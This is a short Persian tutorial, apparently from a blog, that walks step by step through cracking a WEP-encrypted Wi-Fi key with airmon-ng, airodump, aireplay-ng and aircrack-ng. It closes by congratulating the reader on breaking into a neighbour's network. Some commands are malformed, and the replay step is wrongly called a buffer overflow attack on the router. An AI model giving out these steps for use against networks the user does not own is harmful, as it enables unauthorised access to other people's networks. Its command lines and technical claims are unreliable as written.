با سلام
جهت تست نفوذ شبکه های وایرلسی که با wep رمزنگاری شده اند به صورت زیر عمل می کنیم.
کارت وایرلس خود را به سیستم متصل می کنیم.
با دستور airmon-ng کارت وایرلس خود را شناسایی می کنیم که در اینجا wlan0 است.
با دستور زیر شروع به مانیتور کردن این کارت می کنیم.
|
1 |
airmon-ng start wlan0 |
به ما یک آی دی می دهد که معمولا به نام mon0 است.
با دستور زیر شروع به دامپ کردن شبکه های اطراف می کنیم.
|
1 |
airodump -ng mon0 |
پس از شناسایی شبکه مورد نظر که با WEP رمزنگاری شده با دستور زیر شروع به dump کردن آن می کنیم.
|
1 |
airodump -w justenteraname -c channel --bssid mac mon0 |
- justenteraname: فقط یه اسم وارد می کنیم.
- channel: کانال شبکه مورد نظر رو که در دستور airodump -ng mon0 قابل مشاهده بود را وارد می کنیم.
- mac: مک روتر مورد نظر رو که در دستور airodump -ng mon0 قابل مشاهده بود را وارد می کنیم.
در خروجی کامند قبل میزان data باید به بالا ۵ هزار یا ۲۰ هزار برسد و با توجه به زمان بر بودن این امر به خود روتر حمله سرریزی بافر می کنیم تا زودتر انجام بشه این امر.( با انجام این حمله روتر گیج می شه و…)
به ترتیب دستور های زیر را میزنیم:
|
1 |
aireplay-ng -1 0 -a mac mon0 |
|
1 |
airodump-ng -3 -b mac mon0 |
بعد از رسیدن مقدار data به میزان مورد نظر ctrl+c را میزنیم و در کامند زیر اسم فایل را که در کامندهای قبل داده بودیم وارد می کنیم(پسوند این فایل .cap است.)
|
1 |
aircrack-ng filename.cap |
پس از چند ثانیه key را به شما میدهد.
تبریک میگم، شما موفق به تست نفوذ وایرلس همسایه شدین. 🙂
این مطلب تکمیل می گردد + فیلم آموزشی
